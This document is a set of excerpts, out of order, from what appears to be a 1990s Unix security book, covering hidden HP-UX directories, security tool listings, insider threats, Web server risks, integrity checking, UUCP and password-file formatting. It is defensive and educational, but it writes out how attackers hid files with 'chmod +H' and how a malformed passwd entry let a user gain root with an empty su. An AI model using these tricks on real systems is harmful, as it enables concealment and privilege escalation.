unresolved; no file with that pathname appears to exist...<br />

A hidden directory itself can be accessed explicitly, overriding the normal selection<br />

according to context, by appending the character `+' to the directory's file name.<br />

Thus, HP-UX had directories that were invisible unless they contained a file that matched the running
process's current context.

CDFs are a powerful abstraction, but they were sometimes exploited by attackers. For example, the
following sequence of commands would create a CDF directory:

% mkdir ./Hidden<br />

% chmod +H ./Hidden<br />

This resulted in a directory that was normally invisible unless the -H option was used with the ls or find<br />

commands. A clever attacker could store all kinds of tools, stolen data files, and other interesting bits in<br />


such a directory. If the system administrator was not in the habit of using the ls command with the -H
option, or was never trained to do so, then the directory might go unnoticed. The cracker could also find
an existing CDF and store things in it among the other files! As long as none of the filenames matched an
existing context, they would probably never be noticed.

Even worse, tools the system administrator obtained for checking the system's overall security might not<br />

be aware of the -H flag, and not invoke it.<br />

HP has dropped support for CDFs and moved to the use of NFS in version 10 of HP-UX, released in the
spring of 1995. If you are not using version 10 or later, you should be sure to use the -H option on all
ls and find commands!
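For example, using the Hidden directory created above, here is a rough sketch of what an administrator
on such a system would have to do (the exact option handling may vary between HP-UX releases):

% ls -l
% ls -lH
% ls -l Hidden+

The first command does not show the hidden directory at all; adding -H makes it appear, and appending
the + character to its name lists the directory's contents directly.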


Appendix E<br />

Electronic Resources<br />

E.4 Software Resources<br />

This appendix describes some of the tools and packages available on the <strong>Internet</strong> that you might find<br />

useful in maintaining security at your site. Many of these tools are mentioned in this book. Although this<br />

software is freely available, some of it is restricted in various ways by the authors (e.g., it may not be<br />

permitted to be used for commercial purposes or be included on a CD-ROM, etc.) or by the U.S.<br />

government (e.g., if it contains cryptography, it can't ordinarily be exported outside the United States).

Carefully read the documentation files that are distributed with the packages. If you have any doubt<br />

about appropriate use restrictions, contact the author(s) directly.<br />

Although we have used most of the software listed here, we can't take responsibility for ensuring that the
copy you get will work properly and won't cause any damage to your system. As with any software, test

it before you use it!<br />

COAST Software Archive<br />

The Computer Operations, Audit, and <strong>Sec</strong>urity Technology (COAST) project at Purdue University<br />

provides a valuable service to the <strong>Internet</strong> community by maintaining a current and well-organized<br />

repository of the most important security tools and documents on the <strong>Internet</strong>.<br />

The repository is available on host coast.cs.purdue.edu via anonymous FTP; start in the /pub/aux<br />

directory for listings of the documents and tools available. Many of the descriptions of tools in the list<br />

below are drawn from COAST's tools.abstracts file, and we gratefully acknowledge their permission to

use this information. To find out more about COAST, point a WWW viewer at their Web page:<br />

http://www.cs.purdue.edu/coast<br />

Note that the COAST FTP archive does not contain cryptographic software because of the export control<br />

issues involved. However, nearly everything else related to security is available in the archive. If you<br />

find something missing from the archive that you think should be present, contact the following email<br />

address: security-archive@cs.purdue.edu.<br />

NOTE: Some software distributions carry an external PGP signature (see Chapter 6,<br />

Cryptography). This signature helps you verify that the distribution you receive is the one<br />

packaged by the author. It does not provide any guarantee about the safety or correctness of<br />

the software, however.<br />

Because of the additional confidence that a digital signature can add to software distributed<br />


over the <strong>Internet</strong>, we strongly encourage authors to take the additional step of including a<br />

stand-alone signature. We also encourage users who download software to check several<br />

other sources if they download a package without a signature.<br />

E.4.1 CERN HTTP Daemon<br />

CERN is the European Laboratory for Particle Physics, in Switzerland, and is "the birthplace of the<br />

World Wide Web." The CERN HTTP daemon is one of several common HTTP Servers on the <strong>Internet</strong>.<br />

What makes it particularly interesting is its proxying and caching capabilities, which make it especially<br />

well-suited to firewall applications.<br />

You can get the CERN HTTP daemon from:<br />

ftp://www.w3.org/pub/src/WWWDaemon.tar.Z<br />

E.4.2 chrootuid<br />

The chrootuid daemon, by Wietse Venema, makes the task of running a network service at a low<br />

privilege level and with restricted filesystem access easy. The program can be used to run Gopher,<br />

HTTP, WAIS, and other network daemons in a minimal environment: the daemons have access only to<br />

their own directory tree and run with an unprivileged user ID. This arrangement greatly reduces the<br />

impact of possible security problems in daemon software.<br />

You can get chrootuid from:<br />

ftp://ftp.win.tue.nl/pub/security/<br />

ftp://coast.cs.purdue.edu/pub/tools/unix/chrootuid<br />

E.4.3 COPS (Computer Oracle and Password System)<br />

The COPS package is a collection of short shell files and C programs that perform checks of your system<br />

to determine whether certain weaknesses are present. Included are checks for bad permissions on various<br />

files and directories, and malformed configuration files. The system has been designed to be simple and<br />

easy to verify by reading the code, and simple to modify for special local circumstances.<br />

The original COPS paper was presented at the summer 1990 USENIX Conference in Anaheim, CA. It<br />

was entitled "The COPS <strong>Sec</strong>urity Checker System," by Dan Farmer and Eugene H. Spafford.<br />

Copies of the paper can be obtained as a Purdue technical report by requesting a copy of technical report<br />

CSD-TR-993 from:<br />

Technical Reports<br />

Department of Computer Sciences<br />

Purdue University<br />

West Lafayette, IN 47907-1398<br />

COPS can be obtained from:<br />


ftp://coast.cs.purdue.edu/pub/tools/unix/cops<br />

In addition, any of the public USENIX repositories for comp.sources.unix will have COPS in Volume<br />

22.<br />

E.4.4 ISS (<strong>Internet</strong> <strong>Sec</strong>urity Scanner)<br />

ISS, written by Christopher William Klaus, is the <strong>Internet</strong> <strong>Sec</strong>urity Scanner. When ISS is run from<br />

another system and directed at your system, it probes your system for software bugs and configuration<br />

errors commonly exploited by crackers. Like SATAN, it is a controversial tool; however, ISS is less<br />

controversial than SATAN in that it is older and less capable than SATAN, and it was written by<br />

someone who (at the time it was released) was relatively unknown in the network security community.<br />

Informal conversation with personnel at various response teams indicates that they find ISS involved in a<br />

significant number of intrusions - far more than they find associated with SATAN.<br />

You can get the freeware version of ISS from:<br />

ftp://coast.cs.purdue.edu/pub/tools/unix/iss/<br />

There is a commercial version of ISS that is not available on the net. It is supposed to have many more<br />

features than the freeware version. Neither of the authors has had any experience with the commercial<br />

version of ISS.<br />

E.4.5 Kerberos<br />

Kerberos is a secure network authentication system that is based upon private key cryptography. The<br />

Kerberos source code and papers are available from the Massachusetts Institute of Technology. Contact:<br />

MIT Software Center<br />

W32-300<br />

20 Carlton Street<br />

Cambridge, MA 02139<br />

(617) 253-7686<br />

You can use anonymous FTP to transfer files over the <strong>Internet</strong> from:<br />

ftp://athena-dist.mit.edu/pub/kerberos<br />

E.4.6 portmap<br />

The portmap daemon, written by Wietse Venema, is a replacement program for Sun Microsystems'

portmapper program. Venema's portmap daemon offers access control and logging features that are not<br />

found in Sun's version of the program. It also comes with the source code, allowing you to inspect the<br />

code for problems or modify it with your own additional features, if necessary.<br />

You can get portmap from:<br />

ftp://win.tue.nl/pub/security/portmap-3.shar.Z<br />


ftp://coast.cs.purdue.edu/pub/tools/unix/portmap.shar<br />

E.4.7 SATAN<br />

SATAN, by Wietse Venema and Dan Farmer, is the <strong>Sec</strong>urity Administrator Tool for Analyzing<br />

Networks.[1] Despite the authors' strong credentials in the network security community (Venema is from<br />

Eindhoven University in the Netherlands and is the author of the tcpwrapper package and several other<br />

network security tools; Farmer is the author of COPS), SATAN was a somewhat controversial tool when<br />

it was released. Why? Unlike COPS, Tiger, and other tools that work from within a system, SATAN<br />

probes the system from the outside, as an attacker would. The unfortunate consequence of this approach<br />

is that someone (such as an attacker) can run SATAN against any system, not only those that he already<br />

has access to. According to the authors:<br />

[1] If you don't like the name SATAN, it comes with a script named repent that changes all
references from SATAN to SANTA: Security Administrator Network Tool for Analysis.

SATAN was written because we realized that computer systems are becoming more and<br />

more dependent on the network, and at the same time becoming more and more vulnerable<br />

to attack via that same network.<br />

SATAN is a tool to help systems administrators. It recognizes several common<br />

networking-related security problems, and reports the problems without actually exploiting<br />

them.<br />

For each type of problem found, SATAN offers a tutorial that explains the problem and

what its impact could be. The tutorial also explains what can be done about the problem:<br />

correct an error in a configuration file, install a bugfix from the vendor, use other means to<br />

restrict access, or simply disable service.<br />

SATAN collects information that is available to everyone with access to the network.

With a properly-configured firewall in place, that should be near-zero information for<br />

outsiders.<br />

The controversy over SATAN's release was largely overblown. SATAN scans are usually easy to spot,<br />

and the package is not easy to install and run. Most response teams seem to have more trouble with<br />

people running ISS scans against their networks.<br />

From a design point of view, SATAN is interesting in that the program uses a Web browser as its<br />

presentation system. The source may be obtained from:<br />

ftp://ftp.win.tue.nl/pub/security/satan.tar.Z<br />

Source, documentation, and pointers to defenses may be found at:<br />

http://www.cs.purdue.edu/coast/satan.html<br />


E.4.8 SOCKS<br />

SOCKS, originally written by David Koblas and Michelle Koblas and now maintained by Ying-Da Lee,<br />

is a proxy-building toolkit that allows you to convert standard TCP client programs to proxied versions<br />

of those same programs. There are two parts to SOCKS: client libraries and a generic server. Client<br />

libraries are available for most <strong>UNIX</strong> platforms, as well as for Macintosh and Windows systems. The<br />

generic server runs on most <strong>UNIX</strong> platforms and can be used by any of the client libraries, regardless of<br />

the platform.<br />

You can get SOCKS from:<br />

ftp://ftp.nec.com/pub/security/socks.cstc/<br />

ftp://coast.cs.purdue.edu/pub/tools/unix/socks/<br />

E.4.9 Swatch<br />

Swatch, by Todd Atkins of Stanford University, is the Simple Watcher. It monitors log files created by<br />

syslog, and allows an administrator to take specific actions (such as sending an email warning, paging<br />

someone, etc.) in response to logged events and patterns of events.<br />

You can get Swatch from:<br />

ftp://stanford.edu/general/security-tools/swatch<br />

ftp://coast.cs.purdue.edu/pub/tools/unix/swatch/<br />

E.4.10 tcpwrapper<br />

The tcpwrapper is a system written by Wietse Venema that allows you to monitor and filter incoming<br />

requests for servers started by inetd. You can use it to selectively deny access to your sites from other<br />

hosts on the <strong>Internet</strong>, or, alternatively, to selectively allow access.<br />
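As a rough sketch of the style of control it provides (the daemon names, network prefix, and host name
below are invented; see the documentation shipped with the package for the exact syntax and options):

In /etc/hosts.deny:

    ALL: ALL

In /etc/hosts.allow:

    in.telnetd, in.ftpd: 192.168.1. goodhost.friendly.org

With a deny-everything default in hosts.deny, only the services and client machines explicitly listed in
hosts.allow are let through, and connections can be logged through syslog.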

You can get tcpwrapper from:<br />

ftp://ftp.win.tue.nl/pub/security/<br />

ftp://coast.cs.purdue.edu/pub/tools/unix/tcp_wrappers/<br />

E.4.11 Tiger<br />

Tiger, written by Doug Schales of Texas A&M University (TAMU), is a set of scripts that scans a <strong>UNIX</strong><br />

system looking for security problems, in a manner similar to that of Dan Farmer's COPS. Tiger was

originally developed to provide a check of the <strong>UNIX</strong> systems on the A&M campus that users wanted to<br />

be able to access off-campus. Before the packet filtering in the firewall would be modified to allow<br />

off-campus access to the system, the system had to pass the Tiger checks.<br />

You can get Tiger from:<br />

ftp://net.tamu.edu/pub/security/TAMU/<br />


ftp://coast.cs.purdue.edu/pub/tools/unix/tiger<br />

E.4.12 TIS <strong>Internet</strong> Firewall Toolkit<br />

The TIS <strong>Internet</strong> Firewall Toolkit (FWTK), from Trusted Information Systems, Inc., is a useful, well<br />

designed, and well written set of programs for controlling access to <strong>Internet</strong> servers from the <strong>Internet</strong>.<br />

FWTK includes:<br />

●   An authentication server that provides several mechanisms for supporting nonreusable passwords

●   An access control program (a wrapper for inetd-started services), netacl

●   Proxy servers for a variety of protocols (FTP, HTTP, Gopher, rlogin, Telnet, and X11)

●   A generic proxy server for simple TCP-based protocols using one-to-one or many-to-one
    connections, such as NNTP

●   A wrapper (the smap package) for SMTP servers such as Sendmail to protect them from
    SMTP-based attacks

The toolkit is designed so that you can pick and choose only the pieces you need; you don't have to

install the whole thing. The pieces you do install share a common configuration file, however, which<br />

makes managing configuration changes somewhat easier.<br />

Some parts of the toolkit (the server for the nonreusable password system, for example) require a Data<br />

Encryption Standard (DES) library in some configurations. If your system doesn't have the library (look<br />

for a file named libdes.a in any of your system directories in which code libraries are kept), you can get<br />

one from:<br />

ftp://ftp.psy.uq.oz.au/pub/DES/.<br />

TIS maintains a mailing list for discussions of improvements, bugs, fixes, and so on among people using<br />

the toolkit; send email to fwall-users-request@tis.com to subscribe to this list.

You can get the toolkit from:<br />

ftp://ftp.tis.com/pub/firewalls/toolkit/<br />

E.4.13 trimlog<br />

David Curry's trimlog is designed to help you to manage log files. It reads a configuration file to<br />

determine which files to trim, how to trim them, how much they should be trimmed, and so on. The<br />

program helps keep your logs from growing until they consume all available disk space.<br />

You can get trimlog from:<br />

ftp://coast.cs.purdue.edu/pub/tools/unix/trimlog<br />


E.4.14 Tripwire<br />

Tripwire, written by Gene H. Kim and Gene Spafford of the COAST project at Purdue University, is a<br />

file integrity checker, a utility that compares a designated set of files and directories against information<br />

stored in a previously generated database. Added or deleted files are flagged and reported, as are any<br />

files that have changed from their previously recorded state in the database. Run Tripwire against system<br />

files on a regular basis. If you do so, the program will spot any file changes when it next runs, giving<br />

system administrators information to enact damage-control measures immediately.<br />

You can get Tripwire from:<br />

ftp://coast.cs.purdue.edu/pub/COAST/Tripwire<br />

Several technical reports on Tripwire design and operation are also present in the distribution as<br />

PostScript files.<br />

E.4.15 UDP Packet Relayer<br />

The UDP Packet Relayer, written by Tom Fitzgerald, is a proxy system that provides much the same<br />

functionality for UDP-based clients that SOCKS provides for TCP-based clients.<br />

You can get this proxy system from:<br />

ftp://coast.cs.purdue.edu/pub/tools/unix/udprelay-0.2.tar.gz<br />

E.4.16 wuarchive ftpd<br />

The wuarchive FTP daemon offers many features and security enhancements, such as per-directory<br />

message files shown to any user who enters the directory, limits on number of simultaneous users, and<br />

improved logging and access control. These enhancements are specifically designed to support<br />

anonymous FTP.<br />

You can get the daemon from:<br />

ftp://ftp.wustl.edu/packages/wuarchive-ftpd/<br />

ftp://ftp.uu.net/networking/archival/ftp/wuarchive-ftpd/<br />

An updated version of the server, with enhancements by several people, is available from:<br />

ftp://ftp.academ.com/pub/wu-ftpd/private/<br />


Chapter 27<br />

Who Do You Trust?<br />

27.3 Can You Trust People?<br />

Ultimately, people hack into computers. People delete files and alter system programs. People steal<br />

information. You should determine who you trust (and who you don't trust).<br />

27.3.1 Your Employees?<br />

Much of this book has been devoted to techniques that protect computer systems from attacks by<br />

outsiders. This focus isn't only our preoccupation: overwhelmingly, companies fear attacks from<br />

outsiders more than they fear attacks from the inside. Unfortunately, such fears are misplaced. Statistics<br />

compiled by the FBI and others show that the majority of major economic losses from computer crime<br />

appear to involve people on the "inside."<br />

Companies seem to fear attacks from outsiders more than insiders because they fear the unknown. Few<br />

managers want to believe that their employees would betray their bosses, or the company as a whole.<br />

Few businesses want to believe that their executives would sell themselves out to the competition. As a<br />

result, many organizations spend vast sums protecting themselves from external threats, but do little in<br />

the way of instituting controls and auditing to catch and prevent problems from the inside.<br />

Not protecting your organization against its own employees is a short-sighted policy. Protecting against<br />

insiders automatically buys an organization protection from outsiders as well. After all, what do outside<br />

attackers want most of all? They want an account on your computer, an account from which they can<br />

unobtrusively investigate your system and probe for vulnerabilities. Employees, executives, and other

insiders already have this kind of access to your computers. And, according to recent computer industry<br />

surveys, attacks from outsiders and from rogue software account for only a small percentage of overall<br />

corporate losses; as many as 80% of attacks come from employees and former employees who are<br />

dishonest or disgruntled.<br />

No person in your organization should be placed in a position of absolute trust. Unfortunately, many<br />

organizations implicitly trust the person who runs the firm's computer systems. Increasingly, outside<br />

auditors are now taking a careful look at the policies and procedures in Information Systems support<br />

organizations - making certain that backups are being performed, that employees are accountable for<br />

their actions, and that everybody operates within a framework of checks and balances.<br />


27.3.2 Your System Administrator?<br />

The threat of a dishonest system administrator should be obvious enough. After all, who knows better<br />

where all the goodies are kept, and where all the alarms are set? However, before you say that you trust<br />

your support staff, ask yourself a question: they may be honest, but are they competent?<br />

We know of a recent case in which a departmental server was thoroughly compromised by at least two<br />

different groups of hackers. The system administrator had no idea what had happened, probably because<br />

he wasn't very adept at <strong>UNIX</strong> system administration. How were the intruders eventually discovered?<br />

During a software audit, the system was revealed to be running software that was inconsistent with what<br />

should have been there. What should have been there was an old, unpatched version of the software.[5]<br />

Investigation revealed that hackers had apparently installed new versions of system commands to keep<br />

their environment up to date because the legitimate administrator wasn't doing the job.<br />

[5] Actually, the very latest software should have been there. However, the system<br />

administrator hadn't done any updates in more than two years, so we expected the old<br />

software to be in place.<br />

Essentially, the hackers were doing a better job of maintaining the machine than the hired staff was. The<br />

hackers were then using the machine to stage attacks against other computers on the <strong>Internet</strong>.<br />

In such cases, you probably have more to fear from incompetent staff than from some outsiders. After all,<br />

if the staff bungles the backups, reformats the disk drives, and then accidentally writes over the only

good copies of data you have left, the data is as effectively destroyed as if a professional saboteur had<br />

hacked into the system and deleted it.<br />

27.3.3 Your Vendor?<br />

We heard about one case in which a field service technician for a major computer company was busy<br />

casing sites for later burglaries. He was shown into the building, was given unsupervised access to the<br />

equipment rooms, and was able to obtain alarm codes and door-lock combinations over time. When the<br />

thefts occurred, police were sure the crime was an inside job, but no one immediately realized how<br />

"inside" the technician had become.<br />

There are cases in which U.S. military and diplomatic personnel at overseas postings had computer<br />

problems and took their machines in to local service centers. When they got home, technicians<br />

discovered a wide variety of interesting - and unauthorized - additions to the circuitry.<br />

What about the software you get from the vendor? For instance, AT&T claims that Ken Thompson's<br />

compiler modifications (described earlier under "Trusting Trust") were never in any code that was<br />

shipped to customers. How do we know for sure? What's really in the code on your machines?<br />

27.3.4 Your Consultants?<br />

There are currently several people in the field of computer security consulting whose past is not quite<br />

sterling. These are people who have led major hacking rings, who brag about breaking into corporate and<br />

government computers, and who may have been indicted and prosecuted for computer crimes. Some of<br />

them have even done time in jail. Now they do security consulting - and a few even use their past in<br />


advertising (although most do not).<br />

How trustworthy are these people? Who better to break into your computer system later on than the<br />

person who helped design the defenses? Think about this issue from a liability standpoint - would you<br />

hire a confessed arsonist to install your fire alarm system, or a convicted pedophile to run your company<br />

day-care center? He'd certainly know what to protect the children against! What would your insurance<br />

company have to say about that? Your stockholders?<br />

Some security consultants are more than simply criminals; they are compulsive system hackers. Why<br />

should you believe that they are more trustworthy and have more self control now than they did a few<br />

years ago?<br />

If you are careful not to hire suspicious individuals, how about your service provider? Your maintenance<br />

organization? Your software vendor? The company hired to clean your offices at night? The temp service<br />

that provides you with replacements for your secretary when your secretary goes on leave? Potential<br />

computer criminals, and those with an unsavory past, are as capable of putting on street clothes and<br />

holding down a regular job as anyone else. They don't have a scarlet "H" tattooed on their foreheads.<br />

Can you trust references for your hires or consultants? Consider the story, possibly apocryphal, of the<br />

consultant at the large bank who found a way to crack security and steal $5 million. He was caught by<br />

bank security personnel later, but they couldn't trace the money or discover how he did it. So he struck a<br />

deal with the bank: he'd return all but 10% of the money, forever remain silent about the theft, and reveal<br />

the flaw he exploited in return for no prosecution and a favorable letter of reference. The bank eagerly<br />

agreed, and wrote the loss off as an advertising and training expense. Of course, with the favorable letter,<br />

he quickly got a job at the next bank running the same software. After only a few such job changes, he<br />

was able to retire with a hefty savings account in Switzerland.<br />

Bankers Mistrust<br />

Banks and financial institutions have notorious reputations for not reporting computer crimes. We have<br />

heard of cases in which bank personnel have traced active hacking attempts to a specific person, or<br />

developed evidence showing that someone had penetrated their systems, but they did not report these<br />

cases to the police for fear of the resulting publicity.<br />

In other cases, we've heard that bank personnel have paid people off to get them to stop their attacks and<br />

keep quiet. Some experts in the industry contend that major banks and trading houses are willing to<br />

tolerate a few million dollars in losses per week rather than suffer the perceived bad publicity about a<br />

computer theft. To them, a few million a week is less than the interest they make on investments over a<br />

few hours: it's below the noise threshold.<br />

Are these stories true? We don't know, but we haven't seen too many cases of banks reporting computer<br />

crimes, and we somehow don't think they are immune to attack. If anything, they're bigger targets.<br />

However, we do know that bankers tend to be conservative, and they worry that publicity about computer<br />

problems is bad for business.<br />

Odd, if true. Think about the fact that when some kid with a gun steals $1000 from the tellers at a branch<br />

office, the crime makes the evening news, pictures are in the newspaper, and a regional alert is issued.<br />

No one loses confidence in the bank. But if some hacker steals $5 million as the result of a bug in the<br />


software and a lack of ethics...<br />

Who do you entrust with your life's savings?<br />

27.3.5 Response Personnel?<br />

Your system has been hacked. You have a little information, but not much. If someone acts quickly,<br />

before logs at remote machines are erased, you might be able to identify the culprit. You get a phone call<br />

from someone claiming to be with the CERT-CC, or maybe the FBI. They tell you they learned from the<br />

administrator at another site that your systems might have been hacked. They tell you what to look for,<br />

then ask what you found on your own. They promise to follow right up on the leads you have and ask<br />

you to remain silent so as not to let on to the hackers that someone is hot on their trail. You never hear<br />

back from them, and later inquiries reveal that no one from the agency involved ever called you.<br />

Does this case sound farfetched? It shouldn't. Administrators at commercial sites, government sites, and<br />

even response teams have all received telephone calls from people who claim to be representatives of<br />

various agencies but who aren't. We've also heard that some of these same people have had their email<br />

intercepted, copied, and read on its way to their machines (usually, a hacked service provider or altered<br />

DNS record is all that is needed). The result? The social engineers working the phones have some<br />

additional background information that makes them sound all the more official.<br />

Who do you trust on the telephone when you get a call? Why?<br />


Chapter 18<br />

18. WWW <strong>Sec</strong>urity<br />

Contents:<br />

<strong>Sec</strong>urity and the World Wide Web<br />

Running a <strong>Sec</strong>ure Server<br />

Controlling Access to Files on Your Server<br />

Avoiding the Risks of Eavesdropping<br />

Risks of Web Browsers<br />

Dependence on Third Parties<br />

Summary<br />

This chapter explores a number of security issues that arise with use of the World Wide Web. Because of<br />

the complexities of the World Wide Web, some of the issues mentioned in this chapter overlap with<br />

those in other chapters in this book, most notably Chapter 6, Cryptography, Chapter 17, TCP/IP Services,<br />

and Chapter 23, Writing <strong>Sec</strong>ure SUID and Network Programs.<br />

18.1 <strong>Sec</strong>urity and the World Wide Web<br />

The World Wide Web is a system for exchanging information over the <strong>Internet</strong>. The Web is constructed<br />

from specially written programs called Web servers that make information available on the network.<br />

Other programs, called Web browsers, can be used to access the information that is stored in the servers<br />

and to display it on the user's screen.<br />

The World Wide Web was originally developed as a system for physicists to exchange papers pertaining<br />

to their physics research. Using the Web enabled the physicists to short-circuit the costly and often<br />

prolonged task of publishing research findings in paper scientific journals. Short-circuiting publishers<br />

remains one of the biggest uses of the Web today, with businesses, universities, government agencies,<br />

and even individuals publishing millions of screens of information about themselves and practically<br />

everything else. Many organizations also use the Web for distributing confidential documents within<br />

their organization, and between their organization and its customers.<br />

Another exciting use of the Web today involves putting programs behind Web pages. Programs are<br />

created with a protocol called the Common Gateway Interface (CGI). CGI scripts can be quite simple -<br />

for example, a counter that increments every time a person looks at the page, or a guest book that allows<br />

people to "sign in" to a site. Or they might be quite sophisticated. For example, the FedEx<br />


package-delivery service allows its customers to use the company's World Wide Web server<br />

(http://www.fedex.com) to trace packages. Giving customers access to its computers in this manner<br />

simultaneously saves FedEx money and gives the customers better service.<br />
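At its simplest, a CGI program is just an executable that writes a small header followed by its output.
The sketch below (a script you might install in your server's cgi-bin directory; the location depends on
your server's configuration) does nothing but report the server's local time:

#!/bin/sh
# Emit the required CGI header, a blank line, and then the document body.
echo "Content-type: text/plain"
echo ""
echo "The local time on this server is:"
date

Even a program this small runs with the permissions of the Web server, which is one reason CGI scripts
deserve the same scrutiny as any other network service.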

Many other companies are now exploring the use of the WWW for electronic commerce. Customers<br />

browse catalogs of goods and services, select items, and then pay for them without anything other than a<br />

forms-capable browser.<br />

The World Wide Web is one of the most exciting uses of the <strong>Internet</strong>. But it also poses profound security<br />

challenges. In order of importance, these challenges are:<br />

1.  An attacker may take advantage of bugs in your Web server or in CGI scripts to gain unauthorized
    access to other files on your system, or even to seize control of the entire computer.

2.  Confidential information that is on your Web server may be distributed to unauthorized
    individuals.

3.  Confidential information transmitted between the Web server and the browser can be intercepted.

4.  Bugs in your Web browser (or features you are not aware of) may allow confidential info on your
    Web client to be obtained from a rogue Web server.

5.  Because of the existence of standards and patented technologies, many organizations have found it
    necessary to purchase specially licensed software. This licensed software, in turn, can create its
    own unique vulnerabilities.

Each of these challenges requires its own response. Unfortunately, some of the solutions that are<br />

currently being employed are contradictory. For example, to minimize the risk of eavesdropping, many<br />

organizations have purchased "secure" World Wide Web servers, which implement a variety of<br />

encryption protocols. But these servers require a digitally signed certificate to operate, and that certificate<br />

must be renewed on an annual basis. Consequently, organizations that are dependent on their WWW<br />

servers are exposed to interesting denial of service attacks.<br />

NOTE: There are many Web servers currently in use, and there will be even more in use<br />

within the months after this book is published. While we were working on this book, several<br />

groups distributing Web servers announced or released several new versions of their<br />

programs.<br />

It would be very difficult, and not very useful, for this chapter to discuss the specific details<br />

of specific Web servers. Besides the fact that there are too many of them, they are changing<br />

too fast, so any details included in this book would be out of date within a year of<br />

publication. The <strong>Internet</strong> is evolving too quickly for printed documentation to remain<br />

current.<br />

For this reason, this chapter discusses Web security in fairly general terms. Specific<br />

examples, where appropriate, use the NCSA Web server (with brief mention of the CERN<br />

and WN servers), with the understanding that other Web servers may have similar or<br />

different syntax.<br />

<strong>Sec</strong>urity Information on the WWW<br />


There are a few excellent resources on the World Wide Web pertaining to WWW security issues. If you<br />

are developing CGI programs or running a Web server, you should be sure to look them over, to see what<br />

has happened in the area of Web security since this book was published.<br />

The references are currently located at:<br />

http://www-genome.wi.mit.edu/WWW/faqs/www-security-faq.html<br />

Lincoln D. Stein's WWW <strong>Sec</strong>urity FAQ.<br />

http://www.primus.com/staff/paulp/cgi-security<br />

Paul Phillips' CGI security FAQ.

http://hoohoo.ncsa.uiuc.edu/cgi/security.html<br />

NCSA's CGI security documentation.<br />

http://www.cs.purdue.edu/coast/hotlist.html#securi01<br />

The WWW section of the COAST Lab's hotlist.<br />


Chapter 9

Integrity Management

9.3 A Final Note

Change detection, through integrity monitoring, is very useful for a system administrator. Not only can it<br />

discover malicious changes and act as a form of intrusion detection, but it can also detect:<br />

●   Cases of policy violation by staff, where programs are installed or changed without following the
    proper notification procedure

●   Possible hardware failure leading to data corruption

●   Possible bugs in software leading to data corruption

●   Computer viruses, worms, or other malware

However, there are two key considerations for your mechanism to work, whether you are using rdist,<br />

comparison copies, checklists, or Tripwire:<br />

1.  The copies of software you use as your base, for comparison or database generation, must be
    beyond reproach. If you start with files that have already been corrupted, your mechanism may
    report no change from this corrupted state. Thus, you should usually initialize your software base
    from distribution media to provide a known, good copy to initialize your comparison procedure.

2.  The software and databases you use with them must be protected under all circumstances. If an
    intruder is able to penetrate your defenses and gain root access between scans, he or she can alter
    your programs and edit your comparison copies and databases to quietly accept whatever other
    changes are made to the system. For this reason, you want to keep the software and data on
    physically protected media, such as write-protected disks or removable disks. By interposing a
    physical protection between this data and any malicious hacker, you prevent it from being altered
    even in the event of a total compromise.
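Even without a dedicated package, the same two principles can be applied with standard tools. A minimal
sketch, assuming the baseline is written to removable media mounted on a hypothetical /secure directory:

# find /bin /usr/bin /etc -type f -print | xargs sum > /secure/baseline.sum

Later, regenerate the list for the same directories and compare:

# find /bin /usr/bin /etc -type f -print | xargs sum > /tmp/current.sum
# diff /secure/baseline.sum /tmp/current.sum

This is far weaker than a tool such as Tripwire (a simple checksum is easy for an intruder to forge, and
the baseline still has to live on protected media), but it illustrates the procedure.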


Chapter 15<br />

UUCP<br />

15.2 Versions of UUCP<br />

There are three main versions of UUCP:<br />

●   Version 2

●   HoneyDanBer UUCP (HDB/BNU)

●   Taylor UUCP

Version 2 UUCP was written in 1977 by Mike Lesk, David Nowitz, and Greg Chesson at AT&T Bell<br />

Laboratories. (Version 2 was a rewrite of the first UUCP version, which was written by Lesk the<br />

previous year and was never released outside AT&T.) Version 2 was distributed with <strong>UNIX</strong> Version 7 in<br />

1977, and is at the heart of many vendors' older versions of UUCP. The Berkeley versions of UUCP are<br />

derived largely from Version 2, and include many enhancements.<br />

Version 2 UUCP is seldom seen anymore. It has largely been replaced by HDB UUCP at sites still using<br />

UUCP. We describe it in this chapter for historical reasons and to be complete. However, we encourage<br />

you to think about upgrading to the HDB form, if possible.<br />

In 1983, AT&T researchers Peter Honeyman, David A. Nowitz, and Brian E. Redman developed a new<br />

version of UUCP that became known as HoneyDanBer UUCP. AT&T began distributing this version<br />

with <strong>UNIX</strong> System V Release 3 under the name " Basic Networking Utilities," or BNU. The BNU<br />

version is probably the most commonly used version of UUCP today.<br />

From the system administrator's point of view, the primary difference between these two versions of<br />

UUCP is their configuration files. Version 2 uses one set of configuration files, while BNU has another.<br />

Look in the /usr/lib/uucp directory (on some systems, the directory is renamed /etc/uucp). If you have a<br />

file called USERFILE, you are using Version 2 configuration files, and probably have Version 2 UUCP.<br />

If you have a file called Permissions, you are using BNU configuration files, and probably have BNU.<br />
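That check is easy to script. A small sketch, looking in both of the directories mentioned above:

for dir in /usr/lib/uucp /etc/uucp
do
    [ -f $dir/USERFILE ]    && echo "$dir: Version 2-style configuration files"
    [ -f $dir/Permissions ] && echo "$dir: BNU-style configuration files"
done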

Another significant difference between the two versions is the support for security options and enhanced<br />

logging. BNU is much improved over Version 2 in both regards. We describe the configuration<br />

differences later, and present the logging for BNU in "UUCP Log Files" in Chapter 10.<br />

Taylor UUCP is a version of UUCP written by Ian Lance Taylor. It is a free version of UUCP which is<br />

covered under the GNU Public License. It supports either style of configuration files, and will even allow<br />

you to use both at the same time. Taylor UUCP is frequently distributed with the Linux operating system.<br />

Most Linux distributions use the BNU-style configuration files.<br />


In addition to Taylor UUCP, several free or inexpensive implementations of UUCP are available for<br />

<strong>UNIX</strong>, DOS, MacOS, AmigaOS, and other systems - even VMS! Because these implementations are not<br />

widely used, documentation on them is limited and their security aspects are unknown (at least to us).<br />

Whatever version you are using, we expect that many of our comments in the remainder of this chapter<br />

apply to it.<br />


Chapter 8<br />

Defending Your Accounts<br />

8.2 Monitoring File Format<br />

Most programs that access the /etc/passwd and /etc/group files are very sensitive to problems in the<br />

formatting of those files, or to bad values. Because of the compact representation of the file, entries that are<br />

badly formatted could be hidden.<br />

Traditionally, a number of break-ins to <strong>UNIX</strong> systems occurred when a program that was designed to write to<br />

the /etc/passwd file was given bad input. For instance, early versions of the chfn and yppasswd commands<br />

could be given input with ":" characters or too many characters. The result was a badly formatted record to<br />

write to the /etc/passwd file. Because of the way the records were written, the associated library routines that<br />

wrote to the file would truncate or pad the entries, and might produce an entry at the end that looked like:<br />

::0:0:::<br />

This type of entry would then allow a local user to become a superuser by typing:<br />

$ su ''<br />

#<br />

(The above example changes the user to the null-named account.) Clearly, this result is undesirable.<br />

